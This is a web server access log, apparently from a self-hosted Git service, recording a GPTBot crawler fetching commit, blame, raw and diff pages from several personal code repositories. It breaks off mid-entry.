[Client 74.7.227.38] [Length 387764] [Gzip 16.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:14:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 16185] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:14:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/.vscode" +[17/Feb/2026:14:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10404] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" +[17/Feb/2026:14:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12964] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12996] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" +[17/Feb/2026:14:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 9947] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:14:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9892] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 11704] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html" +[17/Feb/2026:14:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 16958] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 16925] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?files=html%2fpages" [Client 74.7.227.38] [Length 30629] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/pages" +[17/Feb/2026:14:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts?display=source" [Client 74.7.227.38] [Length 11496] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:14:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:14:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12745] [Gzip 6.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 12776] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 10979] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" +[17/Feb/2026:14:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 22318] [Gzip 12.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:14:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 22284] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:14:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 10074] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:14:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 10102] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:14:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" [Client 74.7.227.38] [Length 2086] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:14:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" +[17/Feb/2026:14:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 8781] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:14:43:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" [Client 74.7.227.38] [Length 8781] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md" +[17/Feb/2026:14:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:14:43:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:14:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11468] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:14:43:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10065] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10062] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:43:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18935] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 18934] [Gzip 14.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:43:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9899] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services/geminiService.ts" +[17/Feb/2026:14:43:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 11042] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:14:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27641] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" +[17/Feb/2026:14:43:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=update_status.py" [Client 74.7.227.38] [Length 24874] [Gzip 4.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" +[17/Feb/2026:14:43:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 288109] [Gzip 12.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" +[17/Feb/2026:14:43:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 288717] [Gzip 12.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" +[17/Feb/2026:14:43:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" +[17/Feb/2026:14:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.diff" [Client 74.7.227.38] [Length 128259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:14:43:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47.patch" [Client 74.7.227.38] [Length 130059] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" +[17/Feb/2026:14:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:14:43:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 11476] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:14:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9505] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:14:43:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/status.json" +[17/Feb/2026:14:43:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 9937] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" +[17/Feb/2026:14:43:46 +0000] - 200 200 - GET https 